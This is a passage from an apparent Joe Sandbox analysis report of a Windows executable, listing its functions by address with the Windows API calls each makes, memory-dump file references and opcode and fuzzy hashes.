                                                                                                                      • Opcode Fuzzy Hash: 3faa2159fe6593a4c912d103f12e9d173b3838b5c29c965dd5d4bf61ce851696
                                                                                                                      • Instruction Fuzzy Hash: CE113C31201745AFD722CF16C880F66B7E9EF85764F10C52DE59A86A51C7B1F845CB60
                                                                                                                      Function 003A4D29 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4104443479-0
                                                                                                                      • Opcode ID: 8f18987bb35b2baff0789867a32b92a27879a4fd73e9d049a8f42728d02b6011
                                                                                                                      • Instruction ID: c131b4e9f9b6faef8c0f3404fb8c5f9bfe834aa2cb8750317601e738f876cc8a
                                                                                                                      • Opcode Fuzzy Hash: 8f18987bb35b2baff0789867a32b92a27879a4fd73e9d049a8f42728d02b6011
                                                                                                                      • Instruction Fuzzy Hash: 98017175200541AFC3069B28C951D39F7AAFF963107148159E519CB702CB70AC21CBE0
                                                                                                                      Function 003ACAEE Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4104443479-0
                                                                                                                      • Opcode ID: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                                                                                                                      • Instruction ID: 356723eff408c5653d345aae9d2206fc4b35e1c51fc5c6e529aead53f519721a
                                                                                                                      • Opcode Fuzzy Hash: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                                                                                                                      • Instruction Fuzzy Hash: CB01D672214705AED3169B39CC07F66BBD8DF45760F50852EF95ACA5D1EB72E4008B60
                                                                                                                      Function 003BF2D0 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4104443479-0
                                                                                                                      • Opcode ID: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
                                                                                                                      • Instruction ID: ecaae0b332a0e0d53d27d89a8677ee6a03bf667088c93015efd80924fe9082a8
                                                                                                                      • Opcode Fuzzy Hash: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
                                                                                                                      • Instruction Fuzzy Hash: 19012B39104601EFC7237F29DC01E9BBBE8DF82764B14453EF9584BA51D73599418BA0
                                                                                                                      Function 003A5116 Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CharUpperBuffW.USER32(00000000,?,00000000,?,?,?,003A5A39,?,?,?,-00000003,00000000,00000000), ref: 003A514E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharUpper
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3964851224-0
                                                                                                                      • Opcode ID: 814d4d237ce8427d897e9728a6578466fbcfeca1dbfc5cb16918ace1da97d547
                                                                                                                      • Instruction ID: ab47e4ad8f6be73d28b101766742164440b46e01b52ea8178b7429908d5940e5
                                                                                                                      • Opcode Fuzzy Hash: 814d4d237ce8427d897e9728a6578466fbcfeca1dbfc5cb16918ace1da97d547
                                                                                                                      • Instruction Fuzzy Hash: BEF0F679601A21EBCB235B15C800B3AF7A9EF42F60F018229F4454AA51CB789821CBC4
                                                                                                                      Function 003F95AF Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • WSAStartup.WS2_32(00000202,?), ref: 003F95C9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Startup
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 724789610-0
                                                                                                                      • Opcode ID: 1ee5983377a992b4d5f7bbf77ff76cf2a8d90865a6c992980d20346a3fb613ac
                                                                                                                      • Instruction ID: 620a108e1ac1e34bb9aa5ed818c5a34d9e97091ec1066748892e7c039a2aa15f
                                                                                                                      • Opcode Fuzzy Hash: 1ee5983377a992b4d5f7bbf77ff76cf2a8d90865a6c992980d20346a3fb613ac
                                                                                                                      • Instruction Fuzzy Hash: 1CE065776042546FC320EA68DC45AABB799BF85720F14876ABDA48B2C1DA30D914C7D1
                                                                                                                      Function 003A3E39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,?,?,003A34E2,?,00000001), ref: 003A3E6D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeLibrary
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3664257935-0
                                                                                                                      • Opcode ID: 3cc935aa2668c5428c247d908a8e68e03f0760d8155517b7c82e2ff90c2618cd
                                                                                                                      • Instruction ID: 9a4a16a8c52ec0d69fe48bfca5dabc02993d0a20c8df4c54d4d5d9cf20323e13
                                                                                                                      • Opcode Fuzzy Hash: 3cc935aa2668c5428c247d908a8e68e03f0760d8155517b7c82e2ff90c2618cd
                                                                                                                      • Instruction Fuzzy Hash: 65F01572501741CFCB369F64D490C22BBE4EF167153258A3EF1D682A21C7319944DF00
                                                                                                                      Function 003E79F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 003E7A11
                                                                                                                        • Part of subcall function 003A7E53: _memmove.LIBCMT ref: 003A7EB9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderPath_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3334745507-0
                                                                                                                      • Opcode ID: 49a377a6abae5faf918a4941e3204f3a8760ca11de61bfdc3fcc87bc51d2ba0c
                                                                                                                      • Instruction ID: a0b935877783eed2dd66cb19c9c19e39882786fc7bf21aefbb1f47f5cd9fd0d4
                                                                                                                      • Opcode Fuzzy Hash: 49a377a6abae5faf918a4941e3204f3a8760ca11de61bfdc3fcc87bc51d2ba0c
                                                                                                                      • Instruction Fuzzy Hash: 62D05EA66002282FDB60E6249C49DFB36ADC744144F4002B0786DD2042E920AE4586E0
                                                                                                                      Function 003A193B Relevance: 1.5, APIs: 1, Instructions: 18windowtimeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 003A1952
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSendTimeout
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1599653421-0
                                                                                                                      • Opcode ID: c8efe6b1291ed06430bbd0aae22ae555b296c0420dd6aafa5a68d418991075fd
                                                                                                                      • Instruction ID: bee21c6fbfd527d551897bfd96218ae15856f9b822eda184e96f2739ae22677d
                                                                                                                      • Opcode Fuzzy Hash: c8efe6b1291ed06430bbd0aae22ae555b296c0420dd6aafa5a68d418991075fd
                                                                                                                      • Instruction Fuzzy Hash: B5D0C9B16902087EFB008761CD06DBB775CD721A81F4046617A06D6491D6649E098574
                                                                                                                      Function 003F6FC3 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: TextWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 530164218-0
                                                                                                                      • Opcode ID: 94adc8db019b88d5fb6e725ededb69d6617f19b66acb54c94a13f7fe9c098a4e
                                                                                                                      • Instruction ID: 7c6cb43a689d9cafc9fa87c8cb3b4b010f99adcf51489258de867ddb26977206
                                                                                                                      • Opcode Fuzzy Hash: 94adc8db019b88d5fb6e725ededb69d6617f19b66acb54c94a13f7fe9c098a4e
                                                                                                                      • Instruction Fuzzy Hash: 6BD052362102149F8B01EF99EC44C8ABBE8FF4D3103008062F60ACB230DA21FC50AB84
                                                                                                                      Function 003A4FB3 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,004149DA,?,?,00000000), ref: 003A4FC4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FilePointer
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 973152223-0
                                                                                                                      • Opcode ID: 2621d368b8b3903daf2d76ddacd54070d262d97ee468efddaa4517c7c558144c
                                                                                                                      • Instruction ID: 5d58ed97f6589f0d2b49ead92cb892d7603e66606d6dfbde45e9843576ff6b7b
                                                                                                                      • Opcode Fuzzy Hash: 2621d368b8b3903daf2d76ddacd54070d262d97ee468efddaa4517c7c558144c
                                                                                                                      • Instruction Fuzzy Hash: F7D0C974740208BFEB10CB90DC46FAA7BBCEB04718F600194F600A62D0D2F2BE418B55
                                                                                                                      Function 00414DDC Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClearVariant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1473721057-0
                                                                                                                      • Opcode ID: 9c045b472d6de1bb7b9c539af83352eed1095db5af1dcea310b1538826439ec6
                                                                                                                      • Instruction ID: 768606e569f1d7fcd1a081e7089ade1970e0c9567ed80e53ce9aa745e88b3467
                                                                                                                      • Opcode Fuzzy Hash: 9c045b472d6de1bb7b9c539af83352eed1095db5af1dcea310b1538826439ec6
                                                                                                                      • Instruction Fuzzy Hash: E5D0C9B1500200DBE7316F6AE904B8AB7E8AF40308F24882DE6C686951D776A8D29B16
                                                                                                                      Function 003C4129 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wfsopen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 197181222-0
                                                                                                                      • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                      • Instruction ID: 44ff21e3f6649796fe8bc0f504c34afd92c744f2e59d803ae7da5c6d1b3ae3f4
                                                                                                                      • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                      • Instruction Fuzzy Hash: D8B0927244030C77CE022A82EC02F493B199B50660F048020FB0C1C161A673AAA09A89
                                                                                                                      Function 003A50EC Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CloseHandle.KERNEL32(?,?,?,003A50BE,?,003A5088,?,003ABE3D,004622E8,?,00000000,?,003A3E2E,?,00000000,?), ref: 003A510C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandle
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2962429428-0
                                                                                                                      • Opcode ID: a9bdb06bd168052383b5c03c090764de6e374a7b37a047e06858539e21d88b1a
                                                                                                                      • Instruction ID: 101ba2acd410bc7f8a920224f4b83fa52e4592889f35ab8046388bfeb3459e42
                                                                                                                      • Opcode Fuzzy Hash: a9bdb06bd168052383b5c03c090764de6e374a7b37a047e06858539e21d88b1a
                                                                                                                      • Instruction Fuzzy Hash: 9FE0BF75500B02CFC6368F1AD804412FBF5FFE13613214A2FD0E582560D7B0544ADB50

                                                                                                                      Non-executed Functions

                                                                                                                      Function 0040F5D0 Relevance: 70.6, APIs: 37, Strings: 3, Instructions: 630windowkeyboardnativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BAF7D: GetWindowLongW.USER32(?,000000EB), ref: 003BAF8E
                                                                                                                      • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?,?), ref: 0040F64E
                                                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0040F6AD
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0040F6EA
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0040F711
                                                                                                                      • SendMessageW.USER32 ref: 0040F737
                                                                                                                      • _wcsncpy.LIBCMT ref: 0040F7A3
                                                                                                                      • GetKeyState.USER32(00000011), ref: 0040F7C4
                                                                                                                      • GetKeyState.USER32(00000009), ref: 0040F7D1
                                                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0040F7E7
                                                                                                                      • GetKeyState.USER32(00000010), ref: 0040F7F1
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0040F820
                                                                                                                      • SendMessageW.USER32 ref: 0040F843
                                                                                                                      • SendMessageW.USER32(?,00001030,?,0040DE69), ref: 0040F940
                                                                                                                      • SetCapture.USER32(?), ref: 0040F970
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 0040F9D4
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0040F9FA
                                                                                                                      • ReleaseCapture.USER32 ref: 0040FA05
                                                                                                                      • GetCursorPos.USER32(?), ref: 0040FA3A
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 0040FA47
                                                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0040FAA9
                                                                                                                      • SendMessageW.USER32 ref: 0040FAD3
                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040FB12
                                                                                                                      • SendMessageW.USER32 ref: 0040FB3D
                                                                                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0040FB55
                                                                                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0040FB60
                                                                                                                      • GetCursorPos.USER32(?), ref: 0040FB81
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 0040FB8E
                                                                                                                      • GetParent.USER32(?), ref: 0040FBAA
                                                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0040FC10
                                                                                                                      • SendMessageW.USER32 ref: 0040FC40
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 0040FC96
                                                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0040FCC2
                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040FCEA
                                                                                                                      • SendMessageW.USER32 ref: 0040FD0D
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 0040FD57
                                                                                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0040FD87
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0040FE1C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
